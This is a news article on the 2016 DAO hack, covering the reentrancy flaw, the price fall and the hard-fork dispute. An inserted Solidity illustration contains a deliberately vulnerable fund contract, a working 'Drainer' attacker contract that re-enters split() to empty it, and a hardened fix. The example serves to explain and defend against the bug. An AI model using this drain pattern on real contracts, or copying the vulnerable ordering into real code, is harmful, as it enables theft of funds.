The DAO, a crowdfunded investment fund that runs as a smart contract on the Ethereum blockchain, is currently suffering a massive hack, akin to a bank robbery, in which a single individual has already siphoned off Ether worth over USD $43 million at current values. The hacker is taking advantage of the “recursive calling vulnerability,” a known flaw in the DAO’s contract code that the project’s leadership had consciously decided did not pose a serious threat. The hack has sent Ethereum values plummeting, with the cryptocurrency’s price falling 10 percent to $17.68 within a matter of hours.
As of Friday morning, Gemini, the only government-approved exchange that currently trades in Ether, had not suspended trading, and users in Ethereum discussion forums were hotly debating whether the proposed “hard fork” (a change to Ethereum’s own rules that would undo the theft) constituted a power grab by the currency’s leaders.
The “recursive calling” vulnerability lies in the DAO’s split function, which lets a token holder leave the DAO by moving their share of the Ether into a newly created “child DAO.” The function sends the caller’s funds out before it zeroes the caller’s recorded balance. On Ethereum, sending Ether to an address that is itself a contract hands control to that contract’s code, so the attacker’s contract simply called split again from inside the payout, before the balance had been reset, and the DAO paid out the same balance a second time, then a third, and so on for as long as the recursion could run. This process allowed the attacker to siphon off an almost unlimited amount of Ether from the original DAO, which held more than $150 million in total value, into a child DAO that they fully control. The only good news is that the hacker won’t be able to actually transfer any of the coins out of that child DAO, let alone into Bitcoin or cash, for 27 days, giving the DAO community time to address the problem, if they can agree on how to do so.
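The bug described above is the pattern now known as reentrancy. The following is an added illustration, written for this piece and not taken from the DAO’s own contract: `VulnerableFund` reproduces the DAO’s ordering (pay out first, zero the balance afterwards), `Drainer` is a hypothetical attacker contract whose `receive()` function re-enters `split()` while the first call is still in progress, and `HardenedFund` shows the two standard fixes, updating state before making the external call and refusing re-entrant calls outright. Contract and function names are invented for the example; the real DAO’s split path was more elaborate than this.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Vulnerable: mirrors the DAO's ordering. The payout (an external call that
// runs the recipient's code) happens before the caller's balance is zeroed.
contract VulnerableFund {
    mapping(address => uint256) public balances;

    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }

    // Hypothetical stand-in for the DAO's split function.
    function split() external {
        uint256 amount = balances[msg.sender];
        require(amount > 0, "nothing to split");
        // Interaction first: if msg.sender is a contract, its receive()/fallback
        // runs here and may call split() again while balances[msg.sender] is intact.
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "payout failed");
        // Effect last: by now the caller may already have been paid several times.
        balances[msg.sender] = 0;
    }
}

// Hypothetical attacker contract: re-enters split() from inside the payout.
contract Drainer {
    VulnerableFund public target;

    constructor(VulnerableFund _target) {
        target = _target;
    }

    // Deposit once, then start the first split; each payout re-enters via receive().
    function attack() external payable {
        target.deposit{value: msg.value}();
        target.split();
    }

    // Called by the fund's msg.sender.call{value: amount}("") on every payout.
    receive() external payable {
        // Keep re-entering while the fund can still cover one more full payout.
        if (address(target).balance >= msg.value) {
            target.split();
        }
    }
}

// Hardened: checks-effects-interactions ordering plus a reentrancy guard.
contract HardenedFund {
    mapping(address => uint256) public balances;
    bool private locked;

    // Rejects any call to a guarded function while one is already executing.
    modifier nonReentrant() {
        require(!locked, "reentrant call");
        locked = true;
        _;
        locked = false;
    }

    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }

    function split() external nonReentrant {
        uint256 amount = balances[msg.sender];
        require(amount > 0, "nothing to split");
        balances[msg.sender] = 0; // effect before interaction: a re-entrant call sees 0
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "payout failed");
    }
}
```

Deploying `VulnerableFund`, funding it from several accounts, then calling `Drainer.attack{value: 1 ether}()` empties the fund in one transaction: each nested `split()` reads the same un-zeroed balance. Against `HardenedFund` the same attacker gets exactly its own deposit back, because the balance is zero by the time `receive()` runs and the guard reverts the nested call. Either fix alone would have blocked the DAO drain; using both is the usual practice.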
Any fix, though, would require reaching into the “child DAO” controlled by the attacker, which many in the community are loath to do, because technically that child DAO belongs to the hacker. As some see it, the DAO’s trustworthiness lies in its rigidity. If the code allows for it, it’s legal and permissible. If the code does not allow for it, it cannot be done. So since the hacker was able to exploit the vulnerability, they didn’t technically break any rules.
“Isn’t the DAO working as designed? If a flaw was programmed in, then why should that be fixed unless it is a flaw in ethereum itself?” the top up-voted user on a Reddit thread discussing the hack wrote.
Ethereum itself is not under attack, only the DAO, which is a separate investment entity built on the blockchain principles underlying Ether. Nonetheless, the DAO’s troubles seem to be impacting the price of Ethereum, as some of the currency’s value likely rests on the inherent possibilities of blockchain applications like the DAO. If decentralized initiatives like the DAO continue to falter, as their short history suggests they might, few people may be willing to plow their money into even more ambitious schemes.
Current proposals to fix the problem have at most 27 days to pass before the hacker can walk away with whatever millions remain in the “child DAO” at that time. If the community cannot pull together to stop the attacker from skating away, it could lead to a mass sell-off in the DAO and a potential crash of Ethereum. Perhaps the best news for Ether-holders is that the hacker’s coins only have value as long as Ethereum itself is valuable. So even if they could crash the entire DAO, it may not behoove them to do so. But, of course, the internet is a strange place, and anything is possible.
Correction 7/14/17: A past version of this article incorrectly referred to Ethereum Foundation spokesperson George Hallam as a DAO developer.